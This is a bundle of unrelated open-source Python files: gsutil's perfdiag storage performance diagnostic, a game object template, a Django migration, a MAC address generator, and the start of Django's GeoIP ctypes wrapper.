SUPPORTED_SUB_ARGS from gslib.command import URIS_START_ARG from gslib.commands import config from gslib.exception import CommandException from gslib.help_provider import HELP_NAME from gslib.help_provider import HELP_NAME_ALIASES from gslib.help_provider import HELP_ONE_LINE_SUMMARY from gslib.help_provider import HELP_TEXT from gslib.help_provider import HELP_TYPE from gslib.help_provider import HelpType from gslib.util import IS_LINUX from gslib.util import MakeBitsHumanReadable from gslib.util import MakeHumanReadable from gslib.util import Percentile _detailed_help_text = (""" <B>SYNOPSIS</B> gsutil perfdiag [-i in.json] [-o out.json] [-n iterations] [-c concurrency] [-s size] [-t tests] uri... 
<B>DESCRIPTION</B> The perfdiag command runs a suite of diagnostic tests for a given Google Storage bucket. The 'uri' parameter must name an existing bucket (e.g. gs://foo) to which the user has write permission. Several test files will be uploaded to and downloaded from this bucket. All test files will be deleted at the completion of the diagnostic if it finishes successfully. gsutil performance can be impacted by many factors at the client, server, and in-between, such as: CPU speed; available memory; the access path to the local disk; network bandwidth; contention and error rates along the path between gsutil and Google; operating system buffering configuration; and firewalls and other network elements. The perfdiag command is provided so that customers can run a known measurement suite when troubleshooting performance problems. <B>PROVIDING DIAGNOSTIC OUTPUT TO GOOGLE CLOUD STORAGE TEAM</B> If the Google Cloud Storage Team asks you to run a performance diagnostic please use the following command, and email the output file (output.json) to gs-team@google.com: gsutil perfdiag -o output.json gs://your-bucket <B>OPTIONS</B> -n Sets the number of iterations performed when downloading and uploading files during latency and throughput tests. Defaults to 5. -c Sets the level of concurrency to use while running throughput experiments. The default value of 1 will only run a single read or write operation concurrently. -s Sets the size (in bytes) of the test file used to perform read and write throughput tests. The default is 1 MiB. -t Sets the list of diagnostic tests to perform. The default is to run all diagnostic tests. Must be a comma-separated list containing one or more of the following: lat: Runs N iterations (set with -n) of writing the file, retrieving its metadata, reading the file, and deleting the file. Records the latency of each operation. rthru: Runs N (set with -n) read operations, with at most C (set with -c) reads outstanding at any given time. 
wthru: Runs N (set with -n) write operations, with at most C (set with -c) writes outstanding at any given time. -o Writes the results of the diagnostic to an output file. The output is a JSON file containing system information and performance diagnostic results. The file can be read and reported later using the -i option. -i Reads the JSON output file created using the -o command and prints a formatted description of the results. <B>NOTE</B> The perfdiag command collects system information. It collects your IP address, executes DNS queries to Google servers and collects the results, and collects network statistics information from the output of netstat -s. None of this information will be sent to Google unless you choose to send it. """) class PerfDiagCommand(Command): """Implementation of gsutil perfdiag command.""" # Command specification (processed by parent class). command_spec = { # Name of command. COMMAND_NAME: 'perfdiag', # List of command name aliases. COMMAND_NAME_ALIASES: ['diag', 'diagnostic', 'perf', 'performance'], # Min number of args required by this command. MIN_ARGS: 0, # Max number of args required by this command, or NO_MAX. MAX_ARGS: 1, # Getopt-style string specifying acceptable sub args. SUPPORTED_SUB_ARGS: 'n:c:s:t:i:o:', # True if file URIs acceptable for this command. FILE_URIS_OK: False, # True if provider-only URIs acceptable for this command. PROVIDER_URIS_OK: False, # Index in args of first URI arg. URIS_START_ARG: 0, # True if must configure gsutil before running command. CONFIG_REQUIRED: True, } help_spec = { # Name of command or auxiliary help info for which this help applies. HELP_NAME: 'perfdiag', # List of help name aliases. HELP_NAME_ALIASES: [], # Type of help: HELP_TYPE: HelpType.COMMAND_HELP, # One line summary of this help. HELP_ONE_LINE_SUMMARY: 'Run performance diagnostic', # The full help text. HELP_TEXT: _detailed_help_text, } # Byte sizes to use for testing files. 
# TODO: Consider letting the user specify these sizes with a configuration # parameter. test_file_sizes = ( 0, # 0 bytes 1024, # 1 KB 102400, # 100 KB 1048576, # 1MB ) # List of all diagnostic tests. ALL_DIAG_TESTS = ('rthru', 'wthru', 'lat') # Google Cloud Storage API endpoint host. GOOGLE_API_HOST = boto.gs.connection.GSConnection.DefaultHost def _WindowedExec(self, cmd, n, w, raise_on_error=True): """Executes a command n times with a window size of w. Up to w instances of the command will be executed and left outstanding at a time until n instances of the command have completed. Args: cmd: List containing the command to execute. n: Number of times the command will be executed. w: Window size of outstanding commands being executed. raise_on_error: See _Exec. Raises: Exception: If raise_on_error is set to True and any process exits with a non-zero return code. """ if self.debug: print 'Running command:', cmd devnull_f = open(os.devnull, 'w') num_finished = 0 running = [] while len(running) or num_finished < n: # Fires off new commands that can be executed. while len(running) < w and num_finished + len(running) < n: print 'Starting concurrent command: %s' % (' '.join(cmd)) p = subprocess.Popen(cmd, stdout=devnull_f, stderr=devnull_f) running.append(p) # Checks for finished commands. prev_running = running running = [] for p in prev_running: retcode = p.poll() if retcode is None: running.append(p) elif raise_on_error and retcode: raise CommandException("Received non-zero return code (%d) from " "subprocess '%s'." % (retcode, ' '.join(cmd))) else: num_finished += 1 def _Exec(self, cmd, raise_on_error=True, return_output=False, mute_stderr=False): """Executes a command in a subprocess. Args: cmd: List containing the command to execute. raise_on_error: Whether or not to raise an exception when a process exits with a non-zero return code. return_output: If set to True, the return value of the function is the stdout of the process. 
mute_stderr: If set to True, the stderr of the process is not printed to the console. Returns: The return code of the process or the stdout if return_output is set. Raises: Exception: If raise_on_error is set to True and any process exits with a non-zero return code. """ if self.debug: print 'Running command:', cmd stderr = subprocess.PIPE if mute_stderr else None p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=stderr) (stdoutdata, stderrdata) = p.communicate() if raise_on_error and p.returncode: raise CommandException("Received non-zero return code (%d) from " "subprocess '%s'." % (p.returncode, ' '.join(cmd))) return stdoutdata if return_output else p.returncode def _GsUtil(self, cmd, raise_on_error=True, return_output=False, mute_stderr=False): """Executes a gsutil command in a subprocess. Args: cmd: A list containing the arguments to the gsutil program, e.g. ['ls', 'gs://foo']. raise_on_error: see _Exec. return_output: see _Exec. mute_stderr: see _Exec. Returns: The return code of the process or the stdout if return_output is set. """ cmd = self.gsutil_exec_list + cmd return self._Exec(cmd, raise_on_error=raise_on_error, return_output=return_output, mute_stderr=mute_stderr) def _SetUp(self): """Performs setup operations needed before diagnostics can be run.""" # Stores test result data. self.results = {} # List of test files in a temporary location on disk for latency ops. self.latency_files = [] # Maps each test file path to its size in bytes. self.file_sizes = {} # Maps each test file to its contents as a string. self.file_contents = {} def _MakeFile(file_size): """Creates a temporary file of the given size and returns its path.""" fd, fpath = tempfile.mkstemp(suffix='.bin', prefix='gsutil_test_file', text=False) self.file_sizes[fpath] = file_size f = os.fdopen(fd, 'wb') f.write(os.urandom(file_size)) f.close() f = open(fpath, 'rb') self.file_contents[fpath] = f.read() f.close() return fpath # Create files for latency tests. 
for file_size in self.test_file_sizes: fpath = _MakeFile(file_size) self.latency_files.append(fpath) # Local file on disk for write throughput tests. self.thru_local_file = _MakeFile(self.thru_filesize) # Remote file to write/read from during throughput tests. self.thru_remote_file = (str(self.bucket_uri) + os.path.basename(self.thru_local_file)) def _TearDown(self): """Performs operations to clean things up after performing diagnostics.""" for fpath in self.latency_files + [self.thru_local_file]: try: os.remove(fpath) except OSError: pass self._GsUtil(['rm', self.thru_remote_file], raise_on_error=False, mute_stderr=True) @contextlib.contextmanager def _Time(self, key, bucket): """A context manager that measures time. A context manager that prints a status message before and after executing the inner command and times how long the inner command takes. Keeps track of the timing, aggregated by the given key. Args: key: The key to insert the timing value into a dictionary bucket. bucket: A dictionary to place the timing value in. Yields: For the context manager. """ print key, 'starting...' t0 = time.time() yield t1 = time.time() bucket[key].append(t1 - t0) print key, 'done.' def _RunLatencyTests(self): """Runs latency tests.""" # Stores timing information for each category of operation. self.results['latency'] = defaultdict(list) for i in range(self.num_iterations): print print 'Running latency iteration %d...' % (i+1) for fpath in self.latency_files: basename = os.path.basename(fpath) gsbucket = str(self.bucket_uri) gsuri = gsbucket + basename file_size = self.file_sizes[fpath] readable_file_size = MakeHumanReadable(file_size) print print ("File of size %(size)s located on disk at '%(fpath)s' being " "diagnosed in the cloud at '%(gsuri)s'." 
% {'size': readable_file_size, 'fpath': fpath, 'gsuri': gsuri}) k = self.bucket.key_class(self.bucket) k.key = basename with self._Time('UPLOAD_%d' % file_size, self.results['latency']): k.set_contents_from_string(self.file_contents[fpath]) with self._Time('METADATA_%d' % file_size, self.results['latency']): k.exists() with self._Time('DOWNLOAD_%d' % file_size, self.results['latency']): k.get_contents_as_string() with self._Time('DELETE_%d' % file_size, self.results['latency']): k.delete() def _RunReadThruTests(self): """Runs read throughput tests.""" self.results['read_throughput'] = {'file_size': self.thru_filesize, 'num_times': self.num_iterations, 'concurrency': self.concurrency} # Copy the file to remote location before reading. self._GsUtil(['cp', self.thru_local_file, self.thru_remote_file]) if self.concurrency == 1: k = self.bucket.key_class(self.bucket) k.key = os.path.basename(self.thru_local_file) # Warm up the TCP connection by transferring a couple times first. for i in range(2): k.get_contents_as_string() t0 = time.time() for i in range(self.num_iterations): k.get_contents_as_string() t1 = time.time() else: cmd = self.gsutil_exec_list + ['cp', self.thru_remote_file, os.devnull] t0 = time.time() self._WindowedExec(cmd, self.num_iterations, self.concurrency) t1 = time.time() time_took = t1 - t0 total_bytes_copied = self.thru_filesize * self.num_iterations bytes_per_second = total_bytes_copied / time_took self.results['read_throughput']['time_took'] = time_took self.results['read_throughput']['total_bytes_copied'] = total_bytes_copied self.results['read_throughput']['bytes_per_second'] = bytes_per_second def _RunWriteThruTests(self): """Runs write throughput tests.""" self.results['write_throughput'] = {'file_size': self.thru_filesize, 'num_copies': self.num_iterations, 'concurrency': self.concurrency} if self.concurrency == 1: k = self.bucket.key_class(self.bucket) k.key = os.path.basename(self.thru_local_file) # Warm up the TCP connection by 
transferring a couple times first. for i in range(2): k.set_contents_from_string(self.file_contents[self.thru_local_file]) t0 = time.time() for i in range(self.num_iterations): k.set_contents_from_string(self.file_contents[self.thru_local_file]) t1 = time.time() else: cmd = self.gsutil_exec_list + ['cp', self.thru_local_file, self.thru_remote_file] t0 = time.time() self._WindowedExec(cmd, self.num_iterations, self.concurrency) t1 = time.time() time_took = t1 - t0 total_bytes_copied = self.thru_filesize * self.num_iterations bytes_per_second = total_bytes_copied / time_took self.results['write_throughput']['time_took'] = time_took self.results['write_throughput']['total_bytes_copied'] = total_bytes_copied self.results['write_throughput']['bytes_per_second'] = bytes_per_second def _GetDiskCounters(self): """Retrieves disk I/O statistics for all disks. Adapted from the psutil module's psutil._pslinux.disk_io_counters: http://code.google.com/p/psutil/source/browse/trunk/psutil/_pslinux.py Originally distributed under under a BSD license. Original Copyright (c) 2009, Jay Loden, Dave Daeschler, Giampaolo Rodola. Returns: A dictionary containing disk names mapped to the disk counters from /disk/diskstats. """ # iostat documentation states that sectors are equivalent with blocks and # have a size of 512 bytes since 2.4 kernels. This value is needed to # calculate the amount of disk I/O in bytes. 
sector_size = 512 partitions = [] with open('/proc/partitions', 'r') as f: lines = f.readlines()[2:] for line in lines: _, _, _, name = line.split() if name[-1].isdigit(): partitions.append(name) retdict = {} with open('/proc/diskstats', 'r') as f: for line in f: values = line.split()[:11] _, _, name, reads, _, rbytes, rtime, writes, _, wbytes, wtime = values if name in partitions: rbytes = int(rbytes) * sector_size wbytes = int(wbytes) * sector_size reads = int(reads) writes = int(writes) rtime = int(rtime) wtime = int(wtime) retdict[name] = (reads, writes, rbytes, wbytes, rtime, wtime) return retdict def _GetTcpStats(self): """Tries to parse out TCP packet information from netstat output. Returns: A dictionary containing TCP information """ # netstat return code is non-zero for -s on Linux, so don't raise on error. netstat_output = self._Exec(['netstat', '-s'], return_output=True, raise_on_error=False) netstat_output = netstat_output.strip().lower() found_tcp = False tcp_retransmit = None tcp_received = None tcp_sent = None for line in netstat_output.split('\n'): # Header for TCP section is "Tcp:" in Linux/Mac and # "TCP Statistics for" in Windows. if 'tcp:' in line or 'tcp statistics' in line: found_tcp = True # Linux == "segments retransmited" (sic), Mac == "retransmit timeouts" # Windows == "segments retransmitted". if (found_tcp and tcp_retransmit is None and ('segments retransmited' in line or 'retransmit timeouts' in line or 'segments retransmitted' in line)): tcp_retransmit = ''.join(c for c in line if c in string.digits) # Linux+Windows == "segments received", Mac == "packets received". if (found_tcp and tcp_received is None and ('segments received' in line or 'packets received' in line)): tcp_received = ''.join(c for c in line if c in string.digits) # Linux == "segments send out" (sic), Mac+Windows == "packets sent". 
if (found_tcp and tcp_sent is None and ('segments send out' in line or 'packets sent' in line or 'segments sent' in line)): tcp_sent = ''.join(c for c in line if c in string.digits) result = {} try: result['tcp_retransmit'] = int(tcp_retransmit) result['tcp_received'] = int(tcp_received) result['tcp_sent'] = int(tcp_sent) except (ValueError, TypeError): result['tcp_retransmit'] = None result['tcp_received'] = None result['tcp_sent'] = None return result def _CollectSysInfo(self): """Collects system information.""" sysinfo = {} # Get the local IP address from socket lib. sysinfo['ip_address'] = socket.gethostbyname(socket.gethostname()) # Record the temporary directory used since it can affect performance, e.g. # when on a networked filesystem. sysinfo['tempdir'] = tempfile.gettempdir() # Produces an RFC 2822 compliant GMT timestamp. sysinfo['gmt_timestamp'] = time.strftime('%a, %d %b %Y %H:%M:%S +0000', time.gmtime()) # Execute a CNAME lookup on Google DNS to find what Google server # it's routing to. cmd = ['nslookup', '-type=CNAME', self.GOOGLE_API_HOST] nslookup_cname_output = self._Exec(cmd, return_output=True) m = re.search(r' = (?P<googserv>[^.]+)\.', nslookup_cname_output) sysinfo['googserv_route'] = m.group('googserv') if m else None # Look up IP addresses for Google Server. (hostname, aliaslist, ipaddrlist) = socket.gethostbyname_ex( self.GOOGLE_API_HOST) sysinfo['googserv_ips'] = ipaddrlist # Reverse lookup the hostnames for the Google Server IPs. sysinfo['googserv_hostnames'] = [] for googserv_ip in ipaddrlist: (hostname, aliaslist, ipaddrlist) = socket.gethostbyaddr(googserv_ip) sysinfo['googserv_hostnames'].append(hostname) # Query o-o to find out what the Google DNS thinks is the user's IP. 
cmd = ['nslookup', '-type=TXT', 'o-o.myaddr.google.com.'] nslookup_txt_output = self._Exec(cmd, return_output=True) m = re.search(r'text\s+=\s+"(?P<dnsip>[\.\d]+)"', nslookup_txt_output) sysinfo['dns_o-o_ip'] = m.group('dnsip') if m else None # Try and find the number of CPUs in the system if available. try: sysinfo['cpu_count'] = multiprocessing.cpu_count() except NotImplementedError: sysinfo['cpu_count'] = None # For *nix platforms, obtain the CPU load. try: sysinfo['load_avg'] = list(os.getloadavg()) except (AttributeError, OSError): sysinfo['load_avg'] = None # Try and collect memory information from /proc/meminfo if possible. mem_total = None mem_free = None mem_buffers = None mem_cached = None try: with open('/proc/meminfo', 'r') as f: for line in f: if line.startswith('MemTotal'): mem_total = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('MemFree'): mem_free = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('Buffers'): mem_buffers = (int(''.join(c for c in line if c in string.digits)) * 1000) elif line.startswith('Cached'): mem_cached = (int(''.join(c for c in line if c in string.digits)) * 1000) except (IOError, ValueError): pass sysinfo['meminfo'] = {'mem_total': mem_total, 'mem_free': mem_free, 'mem_buffers': mem_buffers, 'mem_cached': mem_cached} # Get configuration attributes from config module. sysinfo['gsutil_config'] = {} for attr in dir(config): attr_value = getattr(config, attr) # Filter out multiline strings that are not useful. 
if attr.isupper() and not (isinstance(attr_value, basestring) and '\n' in attr_value): sysinfo['gsutil_config'][attr] = attr_value self.results['sysinfo'] = sysinfo def _DisplayStats(self, trials): """Prints out mean, standard deviation, median, and 90th percentile.""" n = len(trials) mean = float(sum(trials)) / n stdev = math.sqrt(sum((x - mean)**2 for x in trials) / n) print str(n).rjust(6), '', print ('%.1f' % (mean * 1000)).rjust(9), '', print ('%.1f' % (stdev * 1000)).rjust(12), '', print ('%.1f' % (Percentile(trials, 0.5) * 1000)).rjust(11), '', print ('%.1f' % (Percentile(trials, 0.9) * 1000)).rjust(11), '' def _DisplayResults(self): """Displays results collected from diagnostic run.""" print print '=' * 78 print 'DIAGNOSTIC RESULTS'.center(78) print '=' * 78 if 'latency' in self.results: print print '-' * 78 print 'Latency'.center(78) print '-' * 78 print ('Operation Size Trials Mean (ms) Std Dev (ms) ' 'Median (ms) 90th % (ms)') print ('========= ========= ====== ========= ============ ' '=========== ===========') for key in sorted(self.results['latency']): trials = sorted(self.results['latency'][key]) op, numbytes = key.split('_') numbytes = int(numbytes) if op == 'METADATA': print 'Metadata'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'DOWNLOAD': print 'Download'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'UPLOAD': print 'Upload'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if op == 'DELETE': print 'Delete'.rjust(9), '', print MakeHumanReadable(numbytes).rjust(9), '', self._DisplayStats(trials) if 'write_throughput' in self.results: print print '-' * 78 print 'Write Throughput'.center(78) print '-' * 78 write_thru = self.results['write_throughput'] print 'Copied a %s file %d times for a total transfer size of %s.' 
% ( MakeHumanReadable(write_thru['file_size']), write_thru['num_copies'], MakeHumanReadable(write_thru['total_bytes_copied'])) print 'Write throughput: %s/s.' % ( MakeBitsHumanReadable(write_thru['bytes_per_second'] * 8)) if 'read_throughput' in self.results: print print '-' * 78 print 'Read Throughput'.center(78) print '-' * 78 read_thru = self.results['read_throughput'] print 'Copied a %s file %d times for a total transfer size of %s.' % ( MakeHumanReadable(read_thru['file_size']), read_thru['num_times'], MakeHumanReadable(read_thru['total_bytes_copied'])) print 'Read throughput: %s/s.' % ( MakeBitsHumanReadable(read_thru['bytes_per_second'] * 8)) if 'sysinfo' in self.results: print print '-' * 78 print 'System Information'.center(78) print '-' * 78 info = self.results['sysinfo'] print 'IP Address: \n %s' % info['ip_address'] print 'Temporary Directory: \n %s' % info['tempdir'] print 'Bucket URI: \n %s' % self.results['bucket_uri'] if 'gmt_timestamp' in info: ts_string = info['gmt_timestamp'] timetuple = None try: # Convert RFC 2822 string to Linux timestamp. timetuple = time.strptime(ts_string, '%a, %d %b %Y %H:%M:%S +0000') except ValueError: pass if timetuple: # Converts the GMT time tuple to local Linux timestamp. localtime = calendar.timegm(timetuple) localdt = datetime.datetime.fromtimestamp(localtime) print 'Measurement time: \n %s' % localdt.strftime( '%Y-%m-%d %I-%M-%S %p %Z') print 'Google Server: \n %s' % info['googserv_route'] print ('Google Server IP Addresses: \n %s' % ('\n '.join(info['googserv_ips']))) print ('Google Server Hostnames: \n %s' % ('\n '.join(info['googserv_hostnames']))) print 'Google DNS thinks your IP is: \n %s' % info['dns_o-o_ip'] print 'CPU Count: \n %s' % info['cpu_count'] print 'CPU Load Average: \n %s' % info['load_avg'] try: print ('Total Memory: \n %s' % MakeHumanReadable(info['meminfo']['mem_total'])) # Free memory is really MemFree + Buffers + Cached. 
print 'Free Memory: \n %s' % MakeHumanReadable( info['meminfo']['mem_free'] + info['meminfo']['mem_buffers'] + info['meminfo']['mem_cached']) except TypeError: pass netstat_after = info['netstat_end'] netstat_before = info['netstat_start'] for tcp_type in ('sent', 'received', 'retransmit'): try: delta = (netstat_after['tcp_%s' % tcp_type] - netstat_before['tcp_%s' % tcp_type]) print 'TCP segments %s during test:\n %d' % (tcp_type, delta) except TypeError: pass if 'disk_counters_end' in info and 'disk_counters_start' in info: print 'Disk Counter Deltas:\n', disk_after = info['disk_counters_end'] disk_before = info['disk_counters_start'] print '', 'disk'.rjust(6), for colname in ['reads', 'writes', 'rbytes', 'wbytes', 'rtime', 'wtime']: print colname.rjust(8), print for diskname in sorted(disk_after): before = disk_before[diskname] after = disk_after[diskname] (reads1, writes1, rbytes1, wbytes1, rtime1, wtime1) = before (reads2, writes2, rbytes2, wbytes2, rtime2, wtime2) = after print '', diskname.rjust(6), deltas = [reads2-reads1, writes2-writes1, rbytes2-rbytes1, wbytes2-wbytes1, rtime2-rtime1, wtime2-wtime1] for delta in deltas: print str(delta).rjust(8), print if self.output_file: with open(self.output_file, 'w') as f: json.dump(self.results, f, indent=2) print print "Output file written to '%s'." % self.output_file print def _ParsePositiveInteger(self, val, msg): """Tries to convert val argument to a positive integer. Args: val: The value (as a string) to convert to a positive integer. msg: The error message to place in the CommandException on an error. Returns: A valid positive integer. Raises: CommandException: If the supplied value is not a valid positive integer. """ try: val = int(val) if val < 1: raise CommandException(msg) return val except ValueError: raise CommandException(msg) def _ParseArgs(self): """Parses arguments for perfdiag command.""" # From -n. self.num_iterations = 5 # From -c. self.concurrency = 1 # From -s. 
self.thru_filesize = 1048576 # From -t. self.diag_tests = self.ALL_DIAG_TESTS # From -o. self.output_file = None # From -i. self.input_file = None if self.sub_opts: for o, a in self.sub_opts: if o == '-n': self.num_iterations = self._ParsePositiveInteger( a, 'The -n parameter must be a positive integer.') if o == '-c': self.concurrency = self._ParsePositiveInteger( a, 'The -c parameter must be a positive integer.') if o == '-s': self.thru_filesize = self._ParsePositiveInteger( a, 'The -s parameter must be a positive integer.') if o == '-t': self.diag_tests = [] for test_name in a.strip().split(','): if test_name.lower() not in self.ALL_DIAG_TESTS: raise CommandException("List of test names (-t) contains invalid " "test name '%s'." % test_name) self.diag_tests.append(test_name) if o == '-o': self.output_file = os.path.abspath(a) if o == '-i': self.input_file = os.path.abspath(a) if not os.path.isfile(self.input_file): raise CommandException("Invalid input file (-i): '%s'." % a) try: with open(self.input_file, 'r') as f: self.results = json.load(f) print "Read input file: '%s'." % self.input_file except ValueError: raise CommandException("Could not decode input file (-i): '%s'." % a) return if not self.args: raise CommandException('Wrong number of arguments for "perfdiag" ' 'command.') self.bucket_uri = self.suri_builder.StorageUri(self.args[0]) if not self.bucket_uri.names_bucket(): raise CommandException('The perfdiag command requires a URI that ' 'specifies a bucket.\n"%s" is not ' 'valid.' % self.bucket_uri) self.bucket = self.bucket_uri.get_bucket() # Command entry point. 
  def RunCommand(self):
    """Called by gsutil when the command is being invoked.

    Parses command-line arguments, then either re-displays a previously
    saved report (-i mode) or runs the requested diagnostics against the
    target bucket, sampling netstat/disk counters before and after so
    deltas can be reported.

    Returns:
      0 on success.
    """
    self._ParseArgs()

    if self.input_file:
      # -i mode: _ParseArgs already loaded self.results from the JSON
      # file, so just render it and stop.
      self._DisplayResults()
      return 0

    print 'Number of iterations to run: %d' % self.num_iterations
    print 'Base bucket URI: %s' % self.bucket_uri
    print 'Concurrency level: %d' % self.concurrency
    print 'Throughput file size: %s' % MakeHumanReadable(self.thru_filesize)
    print 'Diagnostics to run: %s' % (', '.join(self.diag_tests))

    try:
      self._SetUp()

      # Collect generic system info.
      self._CollectSysInfo()
      # Collect netstat info and disk counters before tests (and again later).
      self.results['sysinfo']['netstat_start'] = self._GetTcpStats()
      if IS_LINUX:
        # /proc-based disk counters are only available on Linux.
        self.results['sysinfo']['disk_counters_start'] = self._GetDiskCounters()
      # Record bucket URI.
      self.results['bucket_uri'] = str(self.bucket_uri)

      if 'lat' in self.diag_tests:
        self._RunLatencyTests()
      if 'rthru' in self.diag_tests:
        self._RunReadThruTests()
      if 'wthru' in self.diag_tests:
        self._RunWriteThruTests()

      # Collect netstat info and disk counters after tests.
      self.results['sysinfo']['netstat_end'] = self._GetTcpStats()
      if IS_LINUX:
        self.results['sysinfo']['disk_counters_end'] = self._GetDiskCounters()

      self._DisplayResults()
    finally:
      # Always remove local temp files and the remote test object, even
      # when a diagnostic raised.
      self._TearDown()

    return 0
anhstudios/swganh
refs/heads/develop
data/scripts/templates/object/tangible/furniture/all/shared_bestine_quest_statue.py
2
#### NOTICE: THIS FILE IS AUTOGENERATED #### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY #### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES from swgpy.object import * def create(kernel): result = Tangible() result.template = "object/tangible/furniture/all/shared_bestine_quest_statue.iff" result.attribute_template_id = 6 result.stfName("frn_n","bestine_quest_statue") #### BEGIN MODIFICATIONS #### #### END MODIFICATIONS #### return result
openstates/openstates.org
refs/heads/develop
people_admin/migrations/0002_deltaset_persondelta.py
1
# Generated by Django 2.2.16 on 2021-03-02 16:46 from django.conf import settings import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ("data", "0028_auto_20201022_1642"), ("people_admin", "0001_initial"), ] operations = [ migrations.CreateModel( name="DeltaSet", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("name", models.CharField(max_length=200)), ("pr_url", models.URLField(blank=True, default="")), ("created_at", models.DateTimeField(auto_now_add=True)), ( "created_by", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="delta_sets", to=settings.AUTH_USER_MODEL, ), ), ], ), migrations.CreateModel( name="PersonDelta", fields=[ ( "id", models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name="ID", ), ), ("data_changes", django.contrib.postgres.fields.jsonb.JSONField()), ( "delta_set", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name="person_deltas", to="people_admin.DeltaSet", ), ), ( "person", models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, to="data.Person" ), ), ], ), ]
rdobson/auto-cert-kit
refs/heads/master
acktools/net/__init__.py
2
import random def generate_mac(): """ This function will generate a random MAC. The function generates a MAC with the Xensource, Inc. OUI '00:16:3E'. Care should be taken to ensure duplicates are not used. """ mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] return ':'.join(map(lambda x: "%02x" % x, mac))
Shrews/PyGerrit
refs/heads/master
webapp/django/contrib/gis/utils/geoip.py
7
""" This module houses the GeoIP object, a ctypes wrapper for the MaxMind GeoIP(R) C API (http://www.maxmind.com/app/c). This is an alternative to the GPL licensed Python GeoIP interface provided by MaxMind. GeoIP(R) is a registered trademark of MaxMind, LLC of Boston, Massachusetts. For IP-based geolocation, this module requires the GeoLite Country and City datasets, in binary format (CSV will not work!). The datasets may be downloaded from MaxMind at http://www.maxmind.com/download/geoip/database/. Grab GeoIP.dat.gz and GeoLiteCity.dat.gz, and unzip them in the directory corresponding to settings.GEOIP_PATH. See the GeoIP docstring and examples below for more details. TODO: Verify compatibility with Windows. Example: >>> from django.contrib.gis.utils import GeoIP >>> g = GeoIP() >>> g.country('google.com') {'country_code': 'US', 'country_name': 'United States'} >>> g.city('72.14.207.99') {'area_code': 650, 'city': 'Mountain View', 'country_code': 'US', 'country_code3': 'USA', 'country_name': 'United States', 'dma_code': 807, 'latitude': 37.419200897216797, 'longitude': -122.05740356445312, 'postal_code': '94043', 'region': 'CA'} >>> g.lat_lon('salon.com') (37.789798736572266, -122.39420318603516) >>> g.lon_lat('uh.edu') (-95.415199279785156, 29.77549934387207) >>> g.geos('24.124.1.80').wkt 'POINT (-95.2087020874023438 39.0392990112304688)' """ import os, re from ctypes import c_char_p, c_float, c_int, Structure, CDLL, POINTER from ctypes.util import find_library from django.conf import settings if not settings._target: settings.configure() # Creating the settings dictionary with any settings, if needed. GEOIP_SETTINGS = dict((key, getattr(settings, key)) for key in ('GEOIP_PATH', 'GEOIP_LIBRARY_PATH', 'GEOIP_COUNTRY', 'GEOIP_CITY') if hasattr(settings, key)) lib_path = GEOIP_SETTINGS.get('GEOIP_LIBRARY_PATH', None) # GeoIP Exception class. class GeoIPException(Exception): pass # The shared library for the GeoIP C API. 
May be downloaded # from http://www.maxmind.com/download/geoip/api/c/ if lib_path: lib_name = None else: # TODO: Is this really the library name for Windows? lib_name = 'GeoIP' # Getting the path to the GeoIP library. if lib_name: lib_path = find_library(lib_name) if lib_path is None: raise GeoIPException('Could not find the GeoIP library (tried "%s"). ' 'Try setting GEOIP_LIBRARY_PATH in your settings.' % lib_name) lgeoip = CDLL(lib_path) # Regular expressions for recognizing IP addresses and the GeoIP # free database editions. ipregex = re.compile(r'^(?P<w>\d\d?\d?)\.(?P<x>\d\d?\d?)\.(?P<y>\d\d?\d?)\.(?P<z>\d\d?\d?)$') free_regex = re.compile(r'^GEO-\d{3}FREE') lite_regex = re.compile(r'^GEO-\d{3}LITE') #### GeoIP C Structure definitions #### class GeoIPRecord(Structure): _fields_ = [('country_code', c_char_p), ('country_code3', c_char_p), ('country_name', c_char_p), ('region', c_char_p), ('city', c_char_p), ('postal_code', c_char_p), ('latitude', c_float), ('longitude', c_float), ('dma_code', c_int), ('area_code', c_int), ] class GeoIPTag(Structure): pass #### ctypes function prototypes #### RECTYPE = POINTER(GeoIPRecord) DBTYPE = POINTER(GeoIPTag) # For retrieving records by name or address. def record_output(func): func.restype = RECTYPE return func rec_by_addr = record_output(lgeoip.GeoIP_record_by_addr) rec_by_name = record_output(lgeoip.GeoIP_record_by_name) # For opening up GeoIP databases. geoip_open = lgeoip.GeoIP_open geoip_open.restype = DBTYPE # String output routines. def string_output(func): func.restype = c_char_p return func geoip_dbinfo = string_output(lgeoip.GeoIP_database_info) cntry_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr) cntry_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name) cntry_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr) cntry_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name) #### GeoIP class #### class GeoIP(object): # The flags for GeoIP memory caching. 
